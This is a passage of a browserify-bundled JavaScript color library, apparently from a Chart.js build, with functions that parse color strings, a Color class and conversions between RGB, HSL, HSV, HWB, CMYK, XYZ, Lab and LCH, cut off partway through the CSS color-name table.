var i = typeof require == "function" && require;
for (var o = 0; o < r.length; o++)s(r[o]);
return s
})({
1: [function (require, module, exports) {
}, {}], 2: [function (require, module, exports) {
/* MIT license */
var colorNames = require(6);
module.exports = {
getRgba: getRgba,
getHsla: getHsla,
getRgb: getRgb,
getHsl: getHsl,
getHwb: getHwb,
getAlpha: getAlpha,
hexString: hexString,
rgbString: rgbString,
rgbaString: rgbaString,
percentString: percentString,
percentaString: percentaString,
hslString: hslString,
hslaString: hslaString,
hwbString: hwbString,
keyword: keyword
}
function getRgba(string) {
if (!string) {
return;
}
var abbr = /^#([a-fA-F0-9]{3})$/,
hex = /^#([a-fA-F0-9]{6})$/,
rgba = /^rgba?\(\s*([+-]?\d+)\s*,\s*([+-]?\d+)\s*,\s*([+-]?\d+)\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)$/,
per = /^rgba?\(\s*([+-]?[\d\.]+)\%\s*,\s*([+-]?[\d\.]+)\%\s*,\s*([+-]?[\d\.]+)\%\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)$/,
keyword = /(\w+)/;
var rgb = [0, 0, 0],
a = 1,
match = string.match(abbr);
if (match) {
match = match[1];
for (var i = 0; i < rgb.length; i++) {
rgb[i] = parseInt(match[i] + match[i], 16);
}
}
else if (match = string.match(hex)) {
match = match[1];
for (var i = 0; i < rgb.length; i++) {
rgb[i] = parseInt(match.slice(i * 2, i * 2 + 2), 16);
}
}
else if (match = string.match(rgba)) {
for (var i = 0; i < rgb.length; i++) {
rgb[i] = parseInt(match[i + 1]);
}
a = parseFloat(match[4]);
}
else if (match = string.match(per)) {
for (var i = 0; i < rgb.length; i++) {
rgb[i] = Math.round(parseFloat(match[i + 1]) * 2.55);
}
a = parseFloat(match[4]);
}
else if (match = string.match(keyword)) {
if (match[1] == "transparent") {
return [0, 0, 0, 0];
}
rgb = colorNames[match[1]];
if (!rgb) {
return;
}
}
for (var i = 0; i < rgb.length; i++) {
rgb[i] = scale(rgb[i], 0, 255);
}
if (!a && a != 0) {
a = 1;
}
else {
a = scale(a, 0, 1);
}
rgb[3] = a;
return rgb;
}
function getHsla(string) {
if (!string) {
return;
}
var hsl = /^hsla?\(\s*([+-]?\d+)(?:deg)?\s*,\s*([+-]?[\d\.]+)%\s*,\s*([+-]?[\d\.]+)%\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)/;
var match = string.match(hsl);
if (match) {
var alpha = parseFloat(match[4]);
var h = scale(parseInt(match[1]), 0, 360),
s = scale(parseFloat(match[2]), 0, 100),
l = scale(parseFloat(match[3]), 0, 100),
a = scale(isNaN(alpha) ? 1 : alpha, 0, 1);
return [h, s, l, a];
}
}
function getHwb(string) {
if (!string) {
return;
}
var hwb = /^hwb\(\s*([+-]?\d+)(?:deg)?\s*,\s*([+-]?[\d\.]+)%\s*,\s*([+-]?[\d\.]+)%\s*(?:,\s*([+-]?[\d\.]+)\s*)?\)/;
var match = string.match(hwb);
if (match) {
var alpha = parseFloat(match[4]);
var h = scale(parseInt(match[1]), 0, 360),
w = scale(parseFloat(match[2]), 0, 100),
b = scale(parseFloat(match[3]), 0, 100),
a = scale(isNaN(alpha) ? 1 : alpha, 0, 1);
return [h, w, b, a];
}
}
function getRgb(string) {
var rgba = getRgba(string);
return rgba && rgba.slice(0, 3);
}
function getHsl(string) {
var hsla = getHsla(string);
return hsla && hsla.slice(0, 3);
}
function getAlpha(string) {
var vals = getRgba(string);
if (vals) {
return vals[3];
}
else if (vals = getHsla(string)) {
return vals[3];
}
else if (vals = getHwb(string)) {
return vals[3];
}
}
// generators
function hexString(rgb) {
return "#" + hexDouble(rgb[0]) + hexDouble(rgb[1])
+ hexDouble(rgb[2]);
}
function rgbString(rgba, alpha) {
if (alpha < 1 || (rgba[3] && rgba[3] < 1)) {
return rgbaString(rgba, alpha);
}
return "rgb(" + rgba[0] + ", " + rgba[1] + ", " + rgba[2] + ")";
}
function rgbaString(rgba, alpha) {
if (alpha === undefined) {
alpha = (rgba[3] !== undefined ? rgba[3] : 1);
}
return "rgba(" + rgba[0] + ", " + rgba[1] + ", " + rgba[2]
+ ", " + alpha + ")";
}
function percentString(rgba, alpha) {
if (alpha < 1 || (rgba[3] && rgba[3] < 1)) {
return percentaString(rgba, alpha);
}
var r = Math.round(rgba[0] / 255 * 100),
g = Math.round(rgba[1] / 255 * 100),
b = Math.round(rgba[2] / 255 * 100);
return "rgb(" + r + "%, " + g + "%, " + b + "%)";
}
function percentaString(rgba, alpha) {
var r = Math.round(rgba[0] / 255 * 100),
g = Math.round(rgba[1] / 255 * 100),
b = Math.round(rgba[2] / 255 * 100);
return "rgba(" + r + "%, " + g + "%, " + b + "%, " + (alpha || rgba[3] || 1) + ")";
}
function hslString(hsla, alpha) {
if (alpha < 1 || (hsla[3] && hsla[3] < 1)) {
return hslaString(hsla, alpha);
}
return "hsl(" + hsla[0] + ", " + hsla[1] + "%, " + hsla[2] + "%)";
}
function hslaString(hsla, alpha) {
if (alpha === undefined) {
alpha = (hsla[3] !== undefined ? hsla[3] : 1);
}
return "hsla(" + hsla[0] + ", " + hsla[1] + "%, " + hsla[2] + "%, "
+ alpha + ")";
}
// hwb is a bit different than rgb(a) & hsl(a) since there is no alpha specific syntax
// (hwb have alpha optional & 1 is default value)
function hwbString(hwb, alpha) {
if (alpha === undefined) {
alpha = (hwb[3] !== undefined ? hwb[3] : 1);
}
return "hwb(" + hwb[0] + ", " + hwb[1] + "%, " + hwb[2] + "%"
+ (alpha !== undefined && alpha !== 1 ? ", " + alpha : "") + ")";
}
function keyword(rgb) {
return reverseNames[rgb.slice(0, 3)];
}
// helpers
function scale(num, min, max) {
return Math.min(Math.max(min, num), max);
}
function hexDouble(num) {
var str = num.toString(16).toUpperCase();
return (str.length < 2) ? "0" + str : str;
}
//create a list of reverse color names
var reverseNames = {};
for (var name in colorNames) {
reverseNames[colorNames[name]] = name;
}
}, {"6": 6}], 3: [function (require, module, exports) {
/* MIT license */
var convert = require(5);
var string = require(2);
var Color = function (obj) {
if (obj instanceof Color) {
return obj;
}
if (!(this instanceof Color)) {
return new Color(obj);
}
this.values = {
rgb: [0, 0, 0],
hsl: [0, 0, 0],
hsv: [0, 0, 0],
hwb: [0, 0, 0],
cmyk: [0, 0, 0, 0],
alpha: 1
};
// parse Color() argument
var vals;
if (typeof obj === 'string') {
vals = string.getRgba(obj);
if (vals) {
this.setValues('rgb', vals);
} else if (vals = string.getHsla(obj)) {
this.setValues('hsl', vals);
} else if (vals = string.getHwb(obj)) {
this.setValues('hwb', vals);
} else {
throw new Error('Unable to parse color from string "' + obj + '"');
}
} else if (typeof obj === 'object') {
vals = obj;
if (vals.r !== undefined || vals.red !== undefined) {
this.setValues('rgb', vals);
} else if (vals.l !== undefined || vals.lightness !== undefined) {
this.setValues('hsl', vals);
} else if (vals.v !== undefined || vals.value !== undefined) {
this.setValues('hsv', vals);
} else if (vals.w !== undefined || vals.whiteness !== undefined) {
this.setValues('hwb', vals);
} else if (vals.c !== undefined || vals.cyan !== undefined) {
this.setValues('cmyk', vals);
} else {
throw new Error('Unable to parse color from object ' + JSON.stringify(obj));
}
}
};
Color.prototype = {
rgb: function () {
return this.setSpace('rgb', arguments);
},
hsl: function () {
return this.setSpace('hsl', arguments);
},
hsv: function () {
return this.setSpace('hsv', arguments);
},
hwb: function () {
return this.setSpace('hwb', arguments);
},
cmyk: function () {
return this.setSpace('cmyk', arguments);
},
rgbArray: function () {
return this.values.rgb;
},
hslArray: function () {
return this.values.hsl;
},
hsvArray: function () {
return this.values.hsv;
},
hwbArray: function () {
var values = this.values;
if (values.alpha !== 1) {
return values.hwb.concat([values.alpha]);
}
return values.hwb;
},
cmykArray: function () {
return this.values.cmyk;
},
rgbaArray: function () {
var values = this.values;
return values.rgb.concat([values.alpha]);
},
hslaArray: function () {
var values = this.values;
return values.hsl.concat([values.alpha]);
},
alpha: function (val) {
if (val === undefined) {
return this.values.alpha;
}
this.setValues('alpha', val);
return this;
},
red: function (val) {
return this.setChannel('rgb', 0, val);
},
green: function (val) {
return this.setChannel('rgb', 1, val);
},
blue: function (val) {
return this.setChannel('rgb', 2, val);
},
hue: function (val) {
if (val) {
val %= 360;
val = val < 0 ? 360 + val : val;
}
return this.setChannel('hsl', 0, val);
},
saturation: function (val) {
return this.setChannel('hsl', 1, val);
},
lightness: function (val) {
return this.setChannel('hsl', 2, val);
},
saturationv: function (val) {
return this.setChannel('hsv', 1, val);
},
whiteness: function (val) {
return this.setChannel('hwb', 1, val);
},
blackness: function (val) {
return this.setChannel('hwb', 2, val);
},
value: function (val) {
return this.setChannel('hsv', 2, val);
},
cyan: function (val) {
return this.setChannel('cmyk', 0, val);
},
magenta: function (val) {
return this.setChannel('cmyk', 1, val);
},
yellow: function (val) {
return this.setChannel('cmyk', 2, val);
},
black: function (val) {
return this.setChannel('cmyk', 3, val);
},
hexString: function () {
return string.hexString(this.values.rgb);
},
rgbString: function () {
return string.rgbString(this.values.rgb, this.values.alpha);
},
rgbaString: function () {
return string.rgbaString(this.values.rgb, this.values.alpha);
},
percentString: function () {
return string.percentString(this.values.rgb, this.values.alpha);
},
hslString: function () {
return string.hslString(this.values.hsl, this.values.alpha);
},
hslaString: function () {
return string.hslaString(this.values.hsl, this.values.alpha);
},
hwbString: function () {
return string.hwbString(this.values.hwb, this.values.alpha);
},
keyword: function () {
return string.keyword(this.values.rgb, this.values.alpha);
},
rgbNumber: function () {
var rgb = this.values.rgb;
return (rgb[0] << 16) | (rgb[1] << 8) | rgb[2];
},
luminosity: function () {
// http://www.w3.org/TR/WCAG20/#relativeluminancedef
var rgb = this.values.rgb;
var lum = [];
for (var i = 0; i < rgb.length; i++) {
var chan = rgb[i] / 255;
lum[i] = (chan <= 0.03928) ? chan / 12.92 : Math.pow(((chan + 0.055) / 1.055), 2.4);
}
return 0.2126 * lum[0] + 0.7152 * lum[1] + 0.0722 * lum[2];
},
contrast: function (color2) {
// http://www.w3.org/TR/WCAG20/#contrast-ratiodef
var lum1 = this.luminosity();
var lum2 = color2.luminosity();
if (lum1 > lum2) {
return (lum1 + 0.05) / (lum2 + 0.05);
}
return (lum2 + 0.05) / (lum1 + 0.05);
},
level: function (color2) {
var contrastRatio = this.contrast(color2);
if (contrastRatio >= 7.1) {
return 'AAA';
}
return (contrastRatio >= 4.5) ? 'AA' : '';
},
dark: function () {
// YIQ equation from http://24ways.org/2010/calculating-color-contrast
var rgb = this.values.rgb;
var yiq = (rgb[0] * 299 + rgb[1] * 587 + rgb[2] * 114) / 1000;
return yiq < 128;
},
light: function () {
return !this.dark();
},
negate: function () {
var rgb = [];
for (var i = 0; i < 3; i++) {
rgb[i] = 255 - this.values.rgb[i];
}
this.setValues('rgb', rgb);
return this;
},
lighten: function (ratio) {
var hsl = this.values.hsl;
hsl[2] += hsl[2] * ratio;
this.setValues('hsl', hsl);
return this;
},
darken: function (ratio) {
var hsl = this.values.hsl;
hsl[2] -= hsl[2] * ratio;
this.setValues('hsl', hsl);
return this;
},
saturate: function (ratio) {
var hsl = this.values.hsl;
hsl[1] += hsl[1] * ratio;
this.setValues('hsl', hsl);
return this;
},
desaturate: function (ratio) {
var hsl = this.values.hsl;
hsl[1] -= hsl[1] * ratio;
this.setValues('hsl', hsl);
return this;
},
whiten: function (ratio) {
var hwb = this.values.hwb;
hwb[1] += hwb[1] * ratio;
this.setValues('hwb', hwb);
return this;
},
blacken: function (ratio) {
var hwb = this.values.hwb;
hwb[2] += hwb[2] * ratio;
this.setValues('hwb', hwb);
return this;
},
greyscale: function () {
var rgb = this.values.rgb;
// http://en.wikipedia.org/wiki/Grayscale#Converting_color_to_grayscale
var val = rgb[0] * 0.3 + rgb[1] * 0.59 + rgb[2] * 0.11;
this.setValues('rgb', [val, val, val]);
return this;
},
clearer: function (ratio) {
var alpha = this.values.alpha;
this.setValues('alpha', alpha - (alpha * ratio));
return this;
},
opaquer: function (ratio) {
var alpha = this.values.alpha;
this.setValues('alpha', alpha + (alpha * ratio));
return this;
},
rotate: function (degrees) {
var hsl = this.values.hsl;
var hue = (hsl[0] + degrees) % 360;
hsl[0] = hue < 0 ? 360 + hue : hue;
this.setValues('hsl', hsl);
return this;
},
/**
* Ported from sass implementation in C
* https://github.com/sass/libsass/blob/0e6b4a2850092356aa3ece07c6b249f0221caced/functions.cpp#L209
*/
mix: function (mixinColor, weight) {
var color1 = this;
var color2 = mixinColor;
var p = weight === undefined ? 0.5 : weight;
var w = 2 * p - 1;
var a = color1.alpha() - color2.alpha();
var w1 = (((w * a === -1) ? w : (w + a) / (1 + w * a)) + 1) / 2.0;
var w2 = 1 - w1;
return this
.rgb(
w1 * color1.red() + w2 * color2.red(),
w1 * color1.green() + w2 * color2.green(),
w1 * color1.blue() + w2 * color2.blue()
)
.alpha(color1.alpha() * p + color2.alpha() * (1 - p));
},
toJSON: function () {
return this.rgb();
},
clone: function () {
// NOTE(SB): using node-clone creates a dependency to Buffer when using browserify,
// making the final build way to big to embed in Chart.js. So let's do it manually,
// assuming that values to clone are 1 dimension arrays containing only numbers,
// except 'alpha' which is a number.
var result = new Color();
var source = this.values;
var target = result.values;
var value, type;
for (var prop in source) {
if (source.hasOwnProperty(prop)) {
value = source[prop];
type = ({}).toString.call(value);
if (type === '[object Array]') {
target[prop] = value.slice(0);
} else if (type === '[object Number]') {
target[prop] = value;
} else {
console.error('unexpected color value:', value);
}
}
}
return result;
}
};
Color.prototype.spaces = {
rgb: ['red', 'green', 'blue'],
hsl: ['hue', 'saturation', 'lightness'],
hsv: ['hue', 'saturation', 'value'],
hwb: ['hue', 'whiteness', 'blackness'],
cmyk: ['cyan', 'magenta', 'yellow', 'black']
};
Color.prototype.maxes = {
rgb: [255, 255, 255],
hsl: [360, 100, 100],
hsv: [360, 100, 100],
hwb: [360, 100, 100],
cmyk: [100, 100, 100, 100]
};
Color.prototype.getValues = function (space) {
var values = this.values;
var vals = {};
for (var i = 0; i < space.length; i++) {
vals[space.charAt(i)] = values[space][i];
}
if (values.alpha !== 1) {
vals.a = values.alpha;
}
// {r: 255, g: 255, b: 255, a: 0.4}
return vals;
};
Color.prototype.setValues = function (space, vals) {
var values = this.values;
var spaces = this.spaces;
var maxes = this.maxes;
var alpha = 1;
var i;
if (space === 'alpha') {
alpha = vals;
} else if (vals.length) {
// [10, 10, 10]
values[space] = vals.slice(0, space.length);
alpha = vals[space.length];
} else if (vals[space.charAt(0)] !== undefined) {
// {r: 10, g: 10, b: 10}
for (i = 0; i < space.length; i++) {
values[space][i] = vals[space.charAt(i)];
}
alpha = vals.a;
} else if (vals[spaces[space][0]] !== undefined) {
// {red: 10, green: 10, blue: 10}
var chans = spaces[space];
for (i = 0; i < space.length; i++) {
values[space][i] = vals[chans[i]];
}
alpha = vals.alpha;
}
values.alpha = Math.max(0, Math.min(1, (alpha === undefined ? values.alpha : alpha)));
if (space === 'alpha') {
return false;
}
var capped;
// cap values of the space prior converting all values
for (i = 0; i < space.length; i++) {
capped = Math.max(0, Math.min(maxes[space][i], values[space][i]));
values[space][i] = Math.round(capped);
}
// convert to all the other color spaces
for (var sname in spaces) {
if (sname !== space) {
values[sname] = convert[space][sname](values[space]);
}
}
return true;
};
Color.prototype.setSpace = function (space, args) {
var vals = args[0];
if (vals === undefined) {
// color.rgb()
return this.getValues(space);
}
// color.rgb(10, 10, 10)
if (typeof vals === 'number') {
vals = Array.prototype.slice.call(args);
}
this.setValues(space, vals);
return this;
};
Color.prototype.setChannel = function (space, index, val) {
var svalues = this.values[space];
if (val === undefined) {
// color.red()
return svalues[index];
} else if (val === svalues[index]) {
// color.red(color.red())
return this;
}
// color.red(100)
svalues[index] = val;
this.setValues(space, svalues);
return this;
};
if (typeof window !== 'undefined') {
window.Color = Color;
}
module.exports = Color;
}, {"2": 2, "5": 5}], 4: [function (require, module, exports) {
/* MIT license */
module.exports = {
rgb2hsl: rgb2hsl,
rgb2hsv: rgb2hsv,
rgb2hwb: rgb2hwb,
rgb2cmyk: rgb2cmyk,
rgb2keyword: rgb2keyword,
rgb2xyz: rgb2xyz,
rgb2lab: rgb2lab,
rgb2lch: rgb2lch,
hsl2rgb: hsl2rgb,
hsl2hsv: hsl2hsv,
hsl2hwb: hsl2hwb,
hsl2cmyk: hsl2cmyk,
hsl2keyword: hsl2keyword,
hsv2rgb: hsv2rgb,
hsv2hsl: hsv2hsl,
hsv2hwb: hsv2hwb,
hsv2cmyk: hsv2cmyk,
hsv2keyword: hsv2keyword,
hwb2rgb: hwb2rgb,
hwb2hsl: hwb2hsl,
hwb2hsv: hwb2hsv,
hwb2cmyk: hwb2cmyk,
hwb2keyword: hwb2keyword,
cmyk2rgb: cmyk2rgb,
cmyk2hsl: cmyk2hsl,
cmyk2hsv: cmyk2hsv,
cmyk2hwb: cmyk2hwb,
cmyk2keyword: cmyk2keyword,
keyword2rgb: keyword2rgb,
keyword2hsl: keyword2hsl,
keyword2hsv: keyword2hsv,
keyword2hwb: keyword2hwb,
keyword2cmyk: keyword2cmyk,
keyword2lab: keyword2lab,
keyword2xyz: keyword2xyz,
xyz2rgb: xyz2rgb,
xyz2lab: xyz2lab,
xyz2lch: xyz2lch,
lab2xyz: lab2xyz,
lab2rgb: lab2rgb,
lab2lch: lab2lch,
lch2lab: lch2lab,
lch2xyz: lch2xyz,
lch2rgb: lch2rgb
}
function rgb2hsl(rgb) {
var r = rgb[0] / 255,
g = rgb[1] / 255,
b = rgb[2] / 255,
min = Math.min(r, g, b),
max = Math.max(r, g, b),
delta = max - min,
h, s, l;
if (max == min)
h = 0;
else if (r == max)
h = (g - b) / delta;
else if (g == max)
h = 2 + (b - r) / delta;
else if (b == max)
h = 4 + (r - g) / delta;
h = Math.min(h * 60, 360);
if (h < 0)
h += 360;
l = (min + max) / 2;
if (max == min)
s = 0;
else if (l <= 0.5)
s = delta / (max + min);
else
s = delta / (2 - max - min);
return [h, s * 100, l * 100];
}
function rgb2hsv(rgb) {
var r = rgb[0],
g = rgb[1],
b = rgb[2],
min = Math.min(r, g, b),
max = Math.max(r, g, b),
delta = max - min,
h, s, v;
if (max == 0)
s = 0;
else
s = (delta / max * 1000) / 10;
if (max == min)
h = 0;
else if (r == max)
h = (g - b) / delta;
else if (g == max)
h = 2 + (b - r) / delta;
else if (b == max)
h = 4 + (r - g) / delta;
h = Math.min(h * 60, 360);
if (h < 0)
h += 360;
v = ((max / 255) * 1000) / 10;
return [h, s, v];
}
function rgb2hwb(rgb) {
var r = rgb[0],
g = rgb[1],
b = rgb[2],
h = rgb2hsl(rgb)[0],
w = 1 / 255 * Math.min(r, Math.min(g, b)),
b = 1 - 1 / 255 * Math.max(r, Math.max(g, b));
return [h, w * 100, b * 100];
}
function rgb2cmyk(rgb) {
var r = rgb[0] / 255,
g = rgb[1] / 255,
b = rgb[2] / 255,
c, m, y, k;
k = Math.min(1 - r, 1 - g, 1 - b);
c = (1 - r - k) / (1 - k) || 0;
m = (1 - g - k) / (1 - k) || 0;
y = (1 - b - k) / (1 - k) || 0;
return [c * 100, m * 100, y * 100, k * 100];
}
function rgb2keyword(rgb) {
return reverseKeywords[JSON.stringify(rgb)];
}
function rgb2xyz(rgb) {
var r = rgb[0] / 255,
g = rgb[1] / 255,
b = rgb[2] / 255;
// assume sRGB
r = r > 0.04045 ? Math.pow(((r + 0.055) / 1.055), 2.4) : (r / 12.92);
g = g > 0.04045 ? Math.pow(((g + 0.055) / 1.055), 2.4) : (g / 12.92);
b = b > 0.04045 ? Math.pow(((b + 0.055) / 1.055), 2.4) : (b / 12.92);
var x = (r * 0.4124) + (g * 0.3576) + (b * 0.1805);
var y = (r * 0.2126) + (g * 0.7152) + (b * 0.0722);
var z = (r * 0.0193) + (g * 0.1192) + (b * 0.9505);
return [x * 100, y * 100, z * 100];
}
function rgb2lab(rgb) {
var xyz = rgb2xyz(rgb),
x = xyz[0],
y = xyz[1],
z = xyz[2],
l, a, b;
x /= 95.047;
y /= 100;
z /= 108.883;
x = x > 0.008856 ? Math.pow(x, 1 / 3) : (7.787 * x) + (16 / 116);
y = y > 0.008856 ? Math.pow(y, 1 / 3) : (7.787 * y) + (16 / 116);
z = z > 0.008856 ? Math.pow(z, 1 / 3) : (7.787 * z) + (16 / 116);
l = (116 * y) - 16;
a = 500 * (x - y);
b = 200 * (y - z);
return [l, a, b];
}
function rgb2lch(args) {
return lab2lch(rgb2lab(args));
}
function hsl2rgb(hsl) {
var h = hsl[0] / 360,
s = hsl[1] / 100,
l = hsl[2] / 100,
t1, t2, t3, rgb, val;
if (s == 0) {
val = l * 255;
return [val, val, val];
}
if (l < 0.5)
t2 = l * (1 + s);
else
t2 = l + s - l * s;
t1 = 2 * l - t2;
rgb = [0, 0, 0];
for (var i = 0; i < 3; i++) {
t3 = h + 1 / 3 * -(i - 1);
t3 < 0 && t3++;
t3 > 1 && t3--;
if (6 * t3 < 1)
val = t1 + (t2 - t1) * 6 * t3;
else if (2 * t3 < 1)
val = t2;
else if (3 * t3 < 2)
val = t1 + (t2 - t1) * (2 / 3 - t3) * 6;
else
val = t1;
rgb[i] = val * 255;
}
return rgb;
}
function hsl2hsv(hsl) {
var h = hsl[0],
s = hsl[1] / 100,
l = hsl[2] / 100,
sv, v;
if (l === 0) {
// no need to do calc on black
// also avoids divide by 0 error
return [0, 0, 0];
}
l *= 2;
s *= (l <= 1) ? l : 2 - l;
v = (l + s) / 2;
sv = (2 * s) / (l + s);
return [h, sv * 100, v * 100];
}
function hsl2hwb(args) {
return rgb2hwb(hsl2rgb(args));
}
function hsl2cmyk(args) {
return rgb2cmyk(hsl2rgb(args));
}
function hsl2keyword(args) {
return rgb2keyword(hsl2rgb(args));
}
function hsv2rgb(hsv) {
var h = hsv[0] / 60,
s = hsv[1] / 100,
v = hsv[2] / 100,
hi = Math.floor(h) % 6;
var f = h - Math.floor(h),
p = 255 * v * (1 - s),
q = 255 * v * (1 - (s * f)),
t = 255 * v * (1 - (s * (1 - f))),
v = 255 * v;
switch (hi) {
case 0:
return [v, t, p];
case 1:
return [q, v, p];
case 2:
return [p, v, t];
case 3:
return [p, q, v];
case 4:
return [t, p, v];
case 5:
return [v, p, q];
}
}
function hsv2hsl(hsv) {
var h = hsv[0],
s = hsv[1] / 100,
v = hsv[2] / 100,
sl, l;
l = (2 - s) * v;
sl = s * v;
sl /= (l <= 1) ? l : 2 - l;
sl = sl || 0;
l /= 2;
return [h, sl * 100, l * 100];
}
function hsv2hwb(args) {
return rgb2hwb(hsv2rgb(args))
}
function hsv2cmyk(args) {
return rgb2cmyk(hsv2rgb(args));
}
function hsv2keyword(args) {
return rgb2keyword(hsv2rgb(args));
}
// http://dev.w3.org/csswg/css-color/#hwb-to-rgb
function hwb2rgb(hwb) {
var h = hwb[0] / 360,
wh = hwb[1] / 100,
bl = hwb[2] / 100,
ratio = wh + bl,
i, v, f, n;
// wh + bl cant be > 1
if (ratio > 1) {
wh /= ratio;
bl /= ratio;
}
i = Math.floor(6 * h);
v = 1 - bl;
f = 6 * h - i;
if ((i & 0x01) != 0) {
f = 1 - f;
}
n = wh + f * (v - wh); // linear interpolation
switch (i) {
default:
case 6:
case 0:
r = v;
g = n;
b = wh;
break;
case 1:
r = n;
g = v;
b = wh;
break;
case 2:
r = wh;
g = v;
b = n;
break;
case 3:
r = wh;
g = n;
b = v;
break;
case 4:
r = n;
g = wh;
b = v;
break;
case 5:
r = v;
g = wh;
b = n;
break;
}
return [r * 255, g * 255, b * 255];
}
function hwb2hsl(args) {
return rgb2hsl(hwb2rgb(args));
}
function hwb2hsv(args) {
return rgb2hsv(hwb2rgb(args));
}
function hwb2cmyk(args) {
return rgb2cmyk(hwb2rgb(args));
}
function hwb2keyword(args) {
return rgb2keyword(hwb2rgb(args));
}
function cmyk2rgb(cmyk) {
var c = cmyk[0] / 100,
m = cmyk[1] / 100,
y = cmyk[2] / 100,
k = cmyk[3] / 100,
r, g, b;
r = 1 - Math.min(1, c * (1 - k) + k);
g = 1 - Math.min(1, m * (1 - k) + k);
b = 1 - Math.min(1, y * (1 - k) + k);
return [r * 255, g * 255, b * 255];
}
function cmyk2hsl(args) {
return rgb2hsl(cmyk2rgb(args));
}
function cmyk2hsv(args) {
return rgb2hsv(cmyk2rgb(args));
}
function cmyk2hwb(args) {
return rgb2hwb(cmyk2rgb(args));
}
function cmyk2keyword(args) {
return rgb2keyword(cmyk2rgb(args));
}
function xyz2rgb(xyz) {
var x = xyz[0] / 100,
y = xyz[1] / 100,
z = xyz[2] / 100,
r, g, b;
r = (x * 3.2406) + (y * -1.5372) + (z * -0.4986);
g = (x * -0.9689) + (y * 1.8758) + (z * 0.0415);
b = (x * 0.0557) + (y * -0.2040) + (z * 1.0570);
// assume sRGB
r = r > 0.0031308 ? ((1.055 * Math.pow(r, 1.0 / 2.4)) - 0.055)
: r = (r * 12.92);
g = g > 0.0031308 ? ((1.055 * Math.pow(g, 1.0 / 2.4)) - 0.055)
: g = (g * 12.92);
b = b > 0.0031308 ? ((1.055 * Math.pow(b, 1.0 / 2.4)) - 0.055)
: b = (b * 12.92);
r = Math.min(Math.max(0, r), 1);
g = Math.min(Math.max(0, g), 1);
b = Math.min(Math.max(0, b), 1);
return [r * 255, g * 255, b * 255];
}
function xyz2lab(xyz) {
var x = xyz[0],
y = xyz[1],
z = xyz[2],
l, a, b;
x /= 95.047;
y /= 100;
z /= 108.883;
x = x > 0.008856 ? Math.pow(x, 1 / 3) : (7.787 * x) + (16 / 116);
y = y > 0.008856 ? Math.pow(y, 1 / 3) : (7.787 * y) + (16 / 116);
z = z > 0.008856 ? Math.pow(z, 1 / 3) : (7.787 * z) + (16 / 116);
l = (116 * y) - 16;
a = 500 * (x - y);
b = 200 * (y - z);
return [l, a, b];
}
function xyz2lch(args) {
return lab2lch(xyz2lab(args));
}
function lab2xyz(lab) {
var l = lab[0],
a = lab[1],
b = lab[2],
x, y, z, y2;
if (l <= 8) {
y = (l * 100) / 903.3;
y2 = (7.787 * (y / 100)) + (16 / 116);
} else {
y = 100 * Math.pow((l + 16) / 116, 3);
y2 = Math.pow(y / 100, 1 / 3);
}
x = x / 95.047 <= 0.008856 ? x = (95.047 * ((a / 500) + y2 - (16 / 116))) / 7.787 : 95.047 * Math.pow((a / 500) + y2, 3);
z = z / 108.883 <= 0.008859 ? z = (108.883 * (y2 - (b / 200) - (16 / 116))) / 7.787 : 108.883 * Math.pow(y2 - (b / 200), 3);
return [x, y, z];
}
function lab2lch(lab) {
var l = lab[0],
a = lab[1],
b = lab[2],
hr, h, c;
hr = Math.atan2(b, a);
h = hr * 360 / 2 / Math.PI;
if (h < 0) {
h += 360;
}
c = Math.sqrt(a * a + b * b);
return [l, c, h];
}
function lab2rgb(args) {
return xyz2rgb(lab2xyz(args));
}
function lch2lab(lch) {
var l = lch[0],
c = lch[1],
h = lch[2],
a, b, hr;
hr = h / 360 * 2 * Math.PI;
a = c * Math.cos(hr);
b = c * Math.sin(hr);
return [l, a, b];
}
function lch2xyz(args) {
return lab2xyz(lch2lab(args));
}
function lch2rgb(args) {
return lab2rgb(lch2lab(args));
}
function keyword2rgb(keyword) {
return cssKeywords[keyword];
}
function keyword2hsl(args) {
return rgb2hsl(keyword2rgb(args));
}
function keyword2hsv(args) {
return rgb2hsv(keyword2rgb(args));
}
function keyword2hwb(args) {
return rgb2hwb(keyword2rgb(args));
}
function keyword2cmyk(args) {
return rgb2cmyk(keyword2rgb(args));
}
function keyword2lab(args) {
return rgb2lab(keyword2rgb(args));
}
function keyword2xyz(args) {
return rgb2xyz(keyword2rgb(args));
}
var cssKeywords = {
aliceblue: [240, 248, 255],
antiquewhite: [250, 235, 215],
aqua: [0, 255, 255],
aquamarine: [127, 255, 212],
azure: [240, 255, 255],
beige: [245, 245, 220],
bisque: [255, 228, 196],
black: [0, 0, 0],
blanchedalmond: [255, 235, 205],
blue: [0, 0, 255],
blueviolet: [138, 43, 226],
brown: [165, 42, 42],
burlywood: [222, 184, 135],
cadetblue: [95, 158, 160],
chartreuse: [127, 255, 0],
chocolate: [210, 105, 30],
coral: [255, 127, 80],
cornflowerblue: [100, 149, 237],
cornsilk: [255, 248, 220],
crimson: [220, 20, 60],
cyan: [0, 255, 255],
darkblue: [0, 0, 139],
darkcyan: [0, 139, 139],
darkgoldenrod: [184, 134, 11],
darkgray: [169, 169, 169],
darkgreen: [0, 100, 0],
darkgrey: [169, 169, 169],
darkkhaki: [189, 183, 107],
darkmagenta: [139, 0, 139],
darkolivegreen: [85, 107, 47],
darkorange: [255, 140, 0],
darkorchid: [153, 50, 204],
darkred: [139, 0, 0],
darksalmon: [233, 150, 122],
darkseagreen: [143, 188, 143],
darkslateblue: [72, 61, 139],
darkslategray: [47, 79, 79],
darkslategrey: [47, 79, 79],
darkturquoise: [0, 206, 209],
darkviolet: [148, 0, 211],
deeppink: [255, 20, 147],
deepskyblue: [0, 191, 255],
dimgray: [105, 105, 105],
dimgrey: [105, 105, 105],
dodgerblue: [30, 144, 255],
firebrick: [178, 34, 34],
floralwhite: [255, 250, 240],
forestgreen: [34, 139, 34],
fuchsia: [255, 0, 255],
gainsboro: [220, 220, 220],
ghostwhite: [248, 248, 255],
gold: [255, 215, 0],
goldenrod: [218, 165, 32],
gray: [128, 128, 128],
green: [0, 128, 0],
greenyellow: [173, 255, 47],
grey: [128, 128, 128],
honeydew: [240, 255, 240],
hotpink: [255, 105, 180],
indianred: [205, 92, 92],
indigo: [75, 0, 130],
ivory: [255, 255, 240],
khaki: [240, 230, 140],
lavender: [230, 230, 250],
lavenderblush: [255, 240, 245],
lawngreen: [124, 252, 0],
lemonchiffon: [255, 250, 205],
lightblue: [173, 216, 230],
lightcoral: [240, 128, 128],
lightcyan: [224, 255, 255],
